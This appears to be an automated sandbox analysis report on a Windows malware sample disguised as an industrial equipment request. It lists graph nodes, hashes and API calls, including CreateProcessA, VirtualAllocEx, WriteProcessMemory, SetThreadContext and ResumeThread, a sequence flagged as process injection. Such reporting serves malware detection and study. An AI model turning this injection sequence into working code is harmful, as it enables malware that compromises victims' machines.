                                                          control_flow_graph 29 9e8cbb6-9e8cc55 31 9e8cc8e-9e8ccae 29->31 32 9e8cc57-9e8cc61 29->32 39 9e8ccb0-9e8ccba 31->39 40 9e8cce7-9e8cd16 31->40 32->31 33 9e8cc63-9e8cc65 32->33 34 9e8cc88-9e8cc8b 33->34 35 9e8cc67-9e8cc71 33->35 34->31 37 9e8cc73 35->37 38 9e8cc75-9e8cc84 35->38 37->38 38->38 41 9e8cc86 38->41 39->40 42 9e8ccbc-9e8ccbe 39->42 48 9e8cd18-9e8cd22 40->48 49 9e8cd4f-9e8ce09 CreateProcessA 40->49 41->34 44 9e8ccc0-9e8ccca 42->44 45 9e8cce1-9e8cce4 42->45 46 9e8cccc 44->46 47 9e8ccce-9e8ccdd 44->47 45->40 46->47 47->47 50 9e8ccdf 47->50 48->49 51 9e8cd24-9e8cd26 48->51 60 9e8ce0b-9e8ce11 49->60 61 9e8ce12-9e8ce98 49->61 50->45 53 9e8cd28-9e8cd32 51->53 54 9e8cd49-9e8cd4c 51->54 55 9e8cd34 53->55 56 9e8cd36-9e8cd45 53->56 54->49 55->56 56->56 58 9e8cd47 56->58 58->54 60->61 71 9e8cea8-9e8ceac 61->71 72 9e8ce9a-9e8ce9e 61->72 74 9e8cebc-9e8cec0 71->74 75 9e8ceae-9e8ceb2 71->75 72->71 73 9e8cea0 72->73 73->71 76 9e8ced0-9e8ced4 74->76 77 9e8cec2-9e8cec6 74->77 75->74 78 9e8ceb4 75->78 80 9e8cee6-9e8ceed 76->80 81 9e8ced6-9e8cedc 76->81 77->76 79 9e8cec8 77->79 78->74 79->76 82 9e8ceef-9e8cefe 80->82 83 9e8cf04 80->83 81->80 82->83 85 9e8cf05 83->85 85->85
                                                          APIs
                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 09E8CDF6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1450462274.0000000009E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_9e80000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID: pG
                                                          • API String ID: 963392458-949659689
                                                          • Opcode ID: d10bf0496f8421dcd3f724c6a931c8ff839d3fa42eea6d813b2da5de75e787ec
                                                          • Instruction ID: 360c8a9f6d12b4e4af1df2fc8a60538940a3b85115854421187bd32cbdf95e0e
                                                          • Opcode Fuzzy Hash: d10bf0496f8421dcd3f724c6a931c8ff839d3fa42eea6d813b2da5de75e787ec
                                                          • Instruction Fuzzy Hash: DDA15B71D00319DFEB20DFA8C8417EEBBB2BB4A314F149569E848A7250DB749D85CFA1
                                                          Function 09E8CBC0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 243processCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 86 9e8cbc0-9e8cc55 88 9e8cc8e-9e8ccae 86->88 89 9e8cc57-9e8cc61 86->89 96 9e8ccb0-9e8ccba 88->96 97 9e8cce7-9e8cd16 88->97 89->88 90 9e8cc63-9e8cc65 89->90 91 9e8cc88-9e8cc8b 90->91 92 9e8cc67-9e8cc71 90->92 91->88 94 9e8cc73 92->94 95 9e8cc75-9e8cc84 92->95 94->95 95->95 98 9e8cc86 95->98 96->97 99 9e8ccbc-9e8ccbe 96->99 105 9e8cd18-9e8cd22 97->105 106 9e8cd4f-9e8ce09 CreateProcessA 97->106 98->91 101 9e8ccc0-9e8ccca 99->101 102 9e8cce1-9e8cce4 99->102 103 9e8cccc 101->103 104 9e8ccce-9e8ccdd 101->104 102->97 103->104 104->104 107 9e8ccdf 104->107 105->106 108 9e8cd24-9e8cd26 105->108 117 9e8ce0b-9e8ce11 106->117 118 9e8ce12-9e8ce98 106->118 107->102 110 9e8cd28-9e8cd32 108->110 111 9e8cd49-9e8cd4c 108->111 112 9e8cd34 110->112 113 9e8cd36-9e8cd45 110->113 111->106 112->113 113->113 115 9e8cd47 113->115 115->111 117->118 128 9e8cea8-9e8ceac 118->128 129 9e8ce9a-9e8ce9e 118->129 131 9e8cebc-9e8cec0 128->131 132 9e8ceae-9e8ceb2 128->132 129->128 130 9e8cea0 129->130 130->128 133 9e8ced0-9e8ced4 131->133 134 9e8cec2-9e8cec6 131->134 132->131 135 9e8ceb4 132->135 137 9e8cee6-9e8ceed 133->137 138 9e8ced6-9e8cedc 133->138 134->133 136 9e8cec8 134->136 135->131 136->133 139 9e8ceef-9e8cefe 137->139 140 9e8cf04 137->140 138->137 139->140 142 9e8cf05 140->142 142->142
                                                          APIs
                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 09E8CDF6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1450462274.0000000009E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_9e80000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID: pG
                                                          • API String ID: 963392458-949659689
                                                          • Opcode ID: 446fb7765ed74917c273999cd8ca3467a4f7103221e2abc04553945e7d6d6383
                                                          • Instruction ID: ff5dea602344c0d883376ca1ea4461b9f4457f71e6da69c457baf0daebd85643
                                                          • Opcode Fuzzy Hash: 446fb7765ed74917c273999cd8ca3467a4f7103221e2abc04553945e7d6d6383
                                                          • Instruction Fuzzy Hash: 24914B71D00319DFEB10DFA8C8417EEBBB2BB4A314F149569E848A7250DB749D85CFA1
                                                          Function 0A798728 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 229 a798728-a79874d call a7967dc 232 a79874f-a79875f 229->232 233 a798762-a7987f4 CreateIconFromResourceEx 229->233 237 a7987fd-a79881a 233->237 238 a7987f6-a7987fc 233->238 238->237
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1451441187.000000000A790000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_a790000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID: CreateFromIconResource
                                                          • String ID:
                                                          • API String ID: 3668623891-0
                                                          • Opcode ID: ed837c07fae2f5ed10d09e5cfa907921a95d3ab36d74239b7f1a085e198dfc62
                                                          • Instruction ID: c9cf206972b2d2b5bc94a5d9614a83eabf4807f16745424cf5ec5037e8cf7b8c
                                                          • Opcode Fuzzy Hash: ed837c07fae2f5ed10d09e5cfa907921a95d3ab36d74239b7f1a085e198dfc62
                                                          • Instruction Fuzzy Hash: 49318B71900349EFCB11DFAAD844ADEBFF8EF49310F14805AE558AB261C335A954CFA1
                                                          Function 09E8C930 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 241 9e8c930-9e8c986 244 9e8c988-9e8c994 241->244 245 9e8c996-9e8c9d5 WriteProcessMemory 241->245 244->245 247 9e8c9de-9e8ca0e 245->247 248 9e8c9d7-9e8c9dd 245->248 248->247
                                                          APIs
                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 09E8C9C8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1450462274.0000000009E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_9e80000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: d01632f5cd4a85c807930512cd0974b697683743e5b5c7b4d211d8ca21161557
                                                          • Instruction ID: ba9a1fdec5c9e007301b606910e9d9512e84282651d20377bcec8e77a736194c
                                                          • Opcode Fuzzy Hash: d01632f5cd4a85c807930512cd0974b697683743e5b5c7b4d211d8ca21161557
                                                          • Instruction Fuzzy Hash: A1215771900349DFDB10DFAAC881BEEBBF5FF49310F10882AE958A7240D7799945CBA5
                                                          Function 09E8C938 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 252 9e8c938-9e8c986 254 9e8c988-9e8c994 252->254 255 9e8c996-9e8c9d5 WriteProcessMemory 252->255 254->255 257 9e8c9de-9e8ca0e 255->257 258 9e8c9d7-9e8c9dd 255->258 258->257
                                                          APIs
                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 09E8C9C8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1450462274.0000000009E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_9e80000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: 0301c59ca367bfaebb7798bc9660621421384c993b5fea285ad309d6f3e4cc97
                                                          • Instruction ID: 9573934b6e9035f68adebc8f47f178d692ef344d615aa99a87b16004fbaedd56
                                                          • Opcode Fuzzy Hash: 0301c59ca367bfaebb7798bc9660621421384c993b5fea285ad309d6f3e4cc97
                                                          • Instruction Fuzzy Hash: B1214871900349DFDB10DFAAC881BEEBBF5FF49310F14882AE959A7240C7789944CBA5
                                                          Function 09E8CA22 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 273 9e8ca22-9e8cab5 ReadProcessMemory 277 9e8cabe-9e8caee 273->277 278 9e8cab7-9e8cabd 273->278 278->277
                                                          APIs
                                                          • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 09E8CAA8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1450462274.0000000009E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_9e80000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          • Opcode ID: 2eb03ee60a18688d4f81ce5a08c1045473d65808feaf4b116ee1a9c5a252366f
                                                          • Instruction ID: a85faf0e503f130b290e9763aefb50313f59da84d32e7955229850afb34e496d
                                                          • Opcode Fuzzy Hash: 2eb03ee60a18688d4f81ce5a08c1045473d65808feaf4b116ee1a9c5a252366f
                                                          • Instruction Fuzzy Hash: 072134718003499FDB10DFAAC881BEEBBF5FF48310F54882AE919A7240C7799901CBA0
                                                          Function 09E8C798 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 262 9e8c798-9e8c7eb 265 9e8c7fb-9e8c7fe 262->265 266 9e8c7ed-9e8c7f9 262->266 267 9e8c805-9e8c82b Wow64SetThreadContext 265->267 266->265 268 9e8c82d-9e8c833 267->268 269 9e8c834-9e8c864 267->269 268->269
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 09E8C81E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1450462274.0000000009E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_9e80000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: dee92cfd055af0060889c7d22e4e0f8cc1743dcb279bca9f301fd5405c174b37
                                                          • Instruction ID: e763fc7e24b2f624a87ae22c242465bb90bfe6c51936cd9c62b46b2a613b4b0d
                                                          • Opcode Fuzzy Hash: dee92cfd055af0060889c7d22e4e0f8cc1743dcb279bca9f301fd5405c174b37
                                                          • Instruction Fuzzy Hash: E4216871D003099FDB10DFAAC8857EEBBF4EF88214F14842AD459A7240D778A946CFA1
                                                          Function 09E8CA28 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 292 9e8ca28-9e8cab5 ReadProcessMemory 295 9e8cabe-9e8caee 292->295 296 9e8cab7-9e8cabd 292->296 296->295
                                                          APIs
                                                          • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 09E8CAA8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1450462274.0000000009E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_9e80000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          • Opcode ID: 7bc73bdc932e699886d2eded6782176112f75cbf8d14c8c44ddd64e63eb4bd74
                                                          • Instruction ID: 9d0c96bcb8670039c98ca5b83bf3fd10cfb115e5dcca20780d091587cf6b1d31
                                                          • Opcode Fuzzy Hash: 7bc73bdc932e699886d2eded6782176112f75cbf8d14c8c44ddd64e63eb4bd74
                                                          • Instruction Fuzzy Hash: BB2125718003499FDB10DFAAC881BEEFBF5FF48310F54842AE919A7240C7799901DBA1
                                                          Function 09E8C7A0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 282 9e8c7a0-9e8c7eb 284 9e8c7fb-9e8c82b Wow64SetThreadContext 282->284 285 9e8c7ed-9e8c7f9 282->285 287 9e8c82d-9e8c833 284->287 288 9e8c834-9e8c864 284->288 285->284 287->288
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 09E8C81E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1450462274.0000000009E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_9e80000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: c4255b00a145cf1fd2c33a3651dc782048d7bd1bca2adc9f1cc498ede68e1844
                                                          • Instruction ID: aa5f6346458e4234d44a9f3904c889db594630ded51451120a9b58cb027f549e
                                                          • Opcode Fuzzy Hash: c4255b00a145cf1fd2c33a3651dc782048d7bd1bca2adc9f1cc498ede68e1844
                                                          • Instruction Fuzzy Hash: F4214771D003099FDB10DFAAC485BEFBBF4EF89214F24842AD459A7240DB78A945CFA1
                                                          Function 09E8C870 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 300 9e8c870-9e8c8bb 303 9e8c8c2-9e8c8f3 VirtualAllocEx 300->303 304 9e8c8fc-9e8c921 303->304 305 9e8c8f5-9e8c8fb 303->305 305->304
                                                          APIs
                                                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 09E8C8E6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1450462274.0000000009E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_9e80000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 6253ad9c947e4c5cdabde7c2ec6f895d9d8e28642bf7aad8855ed9353824304d
                                                          • Instruction ID: f936dd9c76a987eb16a7c131045c42381217cc1cbcfd2029c6e1f5198b7fec77
                                                          • Opcode Fuzzy Hash: 6253ad9c947e4c5cdabde7c2ec6f895d9d8e28642bf7aad8855ed9353824304d
                                                          • Instruction Fuzzy Hash: A1115971800349AFDB10DFAAD845BEFBBF5EF49310F248419E519A7250C779A941CFA1
                                                          Function 0A7967DC Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 309 a7967dc-a7987f4 CreateIconFromResourceEx 311 a7987fd-a79881a 309->311 312 a7987f6-a7987fc 309->312 312->311
                                                          APIs
                                                          • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,0A798742,?,?,?,?,?), ref: 0A7987E7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1451441187.000000000A790000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_a790000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID: CreateFromIconResource
                                                          • String ID:
                                                          • API String ID: 3668623891-0
                                                          • Opcode ID: 54c022385a69faddcc099894dcdd2e1d5d096dc546cc635c7e621e28930303db
                                                          • Instruction ID: e6f4c9791f29a51371742d5477ddfa4a6a72fc97ceed658f33d57c6f954c44da
                                                          • Opcode Fuzzy Hash: 54c022385a69faddcc099894dcdd2e1d5d096dc546cc635c7e621e28930303db
                                                          • Instruction Fuzzy Hash: 9C1126B5800249EFDB10CFAAD844BEEBFF8EB48310F14841AE514A7250C379A954CFA5
                                                          Function 09E8C878 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 315 9e8c878-9e8c8f3 VirtualAllocEx 318 9e8c8fc-9e8c921 315->318 319 9e8c8f5-9e8c8fb 315->319 319->318
                                                          APIs
                                                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 09E8C8E6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1450462274.0000000009E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_9e80000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 6387544d00d90083ba3351fbc7f6c191f0d7c3c0d993798b907b2f3fb5312905
                                                          • Instruction ID: 210c37aabe39b382b4aa46181c0ea586e20aaa95a4ce3ce1b425f9bcaf7f033d
                                                          • Opcode Fuzzy Hash: 6387544d00d90083ba3351fbc7f6c191f0d7c3c0d993798b907b2f3fb5312905
                                                          • Instruction Fuzzy Hash: 2F1126718003499FDB10DFAAD845BDFBBF5EF89310F248419E519A7250C775A941CBA1
                                                          Function 09E8C6EE Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1450462274.0000000009E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_9e80000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 5d7fb08491c38c4f9be3c8fcb8ed1ca9bc14c3a5ba4d3f8119a6b12c632f4a52
                                                          • Instruction ID: 1403899a71c21edf22aa19a6fc2cbb78ebc07e57a112d3df5d2904ac41c318ba
                                                          • Opcode Fuzzy Hash: 5d7fb08491c38c4f9be3c8fcb8ed1ca9bc14c3a5ba4d3f8119a6b12c632f4a52
                                                          • Instruction Fuzzy Hash: 6C116A71C003488FDB10DFAAC8457AFFBF4EB88210F248419D419A7240C7756900CFA0
                                                          Function 09E8C6F0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1450462274.0000000009E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_9e80000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: c0ed4661133e18cf7906efba47bc56ab74da1125849bf1966a0e86cafdb74f0f
                                                          • Instruction ID: bd12f18c9d855900d8ee6f432a7ab0478d827012b1b3efc502ad563dcf1f8cad
                                                          • Opcode Fuzzy Hash: c0ed4661133e18cf7906efba47bc56ab74da1125849bf1966a0e86cafdb74f0f
                                                          • Instruction Fuzzy Hash: 4E113671D003498FDB20DFAAC84579FFBF4AB89624F24841AD419A7240CB79A944CBA5
                                                          Function 0313F2B8 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0313F31D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1426353833.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3130000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID: CallbackDispatcherUser
                                                          • String ID:
                                                          • API String ID: 2492992576-0
                                                          • Opcode ID: 6de7d4dca8b094fec84564444c13d4f4959b14201828107cd776a9266703bd17
                                                          • Instruction ID: ba57db28ff7820a834b32281d2ace9fe82dbabefd838eac7a4f00a445cd4d29f
                                                          • Opcode Fuzzy Hash: 6de7d4dca8b094fec84564444c13d4f4959b14201828107cd776a9266703bd17
                                                          • Instruction Fuzzy Hash: 1411BFB5804398DFDB10CF99E4057DEBFF4EB09314F144099D588A7341C3799A05CBA2
                                                          Function 030DD3B4 Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1425966544.00000000030DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030DD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_30dd000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 16cb6db4458c060478f6e5fc1b2f9c9fbcbea86535cd4e39cdf284aaa0c30116
                                                          • Instruction ID: e6cec61bd228940e5e2b31c14f8e640b135b8dcd86d4d59fd0c0dd729663b081
                                                          • Opcode Fuzzy Hash: 16cb6db4458c060478f6e5fc1b2f9c9fbcbea86535cd4e39cdf284aaa0c30116
                                                          • Instruction Fuzzy Hash: 0F2103B2501344EFDB14DF14D9C0B2AFBE5FF84324F24C5A9E8090BA46C336E456CAA2
                                                          Function 030ED01C Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1426012988.00000000030ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 030ED000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_30ed000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1ff0c9ef2ed4b8466ff35673986605092a3bd5328ef06b70da379830bdc0dbe7
                                                          • Instruction ID: 8814fa1ac11d07a302206999673980b31ef22707678f2560c9ff039a62ad334d
                                                          • Opcode Fuzzy Hash: 1ff0c9ef2ed4b8466ff35673986605092a3bd5328ef06b70da379830bdc0dbe7
                                                          • Instruction Fuzzy Hash: 0421F271604344EFDB14DF24D980B26BBA5FB84315F28C9A9E80A4B246C336D847CA62
                                                          Function 030ED1D4 Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1426012988.00000000030ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 030ED000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_30ed000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a77e6a92f5f8eb9a8acf01b9268b2b8a0d51fe335f15876d0d050728a3d36fa8
                                                          • Instruction ID: bbc70c7a10c0b4e8dd2dd1346b8cd0a261419603cdf3a99364e20b31ff415851
                                                          • Opcode Fuzzy Hash: a77e6a92f5f8eb9a8acf01b9268b2b8a0d51fe335f15876d0d050728a3d36fa8
                                                          • Instruction Fuzzy Hash: DD212675A04344EFDB45DF64D9C0B2ABBA5FB94314F24C9ADE8094F292C336D846CA62
                                                          Function 030ED006 Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1426012988.00000000030ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 030ED000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_30ed000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f8ee4dc07b7b1b17cca8cfaab9f5361cdf0ff2d0faa1e777f3d0b72b65ed02f0
                                                          • Instruction ID: f33bcfd84cbc9748c5373be8ca4f5139e7231175b92fcc6b274f7c65e3f90935
                                                          • Opcode Fuzzy Hash: f8ee4dc07b7b1b17cca8cfaab9f5361cdf0ff2d0faa1e777f3d0b72b65ed02f0
                                                          • Instruction Fuzzy Hash: 35216F75509380DFCB12CF24D994B15BFB1EB46214F2CC5DAD8498F6A7C33A984ACB62
                                                          Function 030DD3AF Relevance: .1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1425966544.00000000030DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030DD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_30dd000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
                                                          • Instruction ID: 831749152bcd03c9d6c8f01958ae8f4c70a042dcad219bf0a15e31286f5c9474
                                                          • Opcode Fuzzy Hash: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
                                                          • Instruction Fuzzy Hash: 56117F76505280DFCB15CF10D9C4B16FFB1FB84324F28C5A9D8494BA56C336E456CBA2
                                                          Function 030ED1CF Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1426012988.00000000030ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 030ED000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_30ed000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                                                          • Instruction ID: 33c77fdad867807d7a938958a96dca95747095a75546b968bc1d47985a13da48
                                                          • Opcode Fuzzy Hash: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                                                          • Instruction Fuzzy Hash: 25118B75A04280DFCB55CF10D5C4B15FBA1FB84214F28C6AED8494B696C33AD44ACB62

                                                          Non-executed Functions

                                                          Function 03134490 Relevance: 2.7, Strings: 2, Instructions: 196COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1426353833.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3130000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: -E&@$|/@T
                                                          • API String ID: 0-3979998924
                                                          • Opcode ID: f3ce036442301d14695dd1c493cab8fc1869c430b868877c6ac9e49a57da781e
                                                          • Instruction ID: fc213069a5028d48f445135151cb111fc16e950e6b1e045e23d0b94a88d7ab00
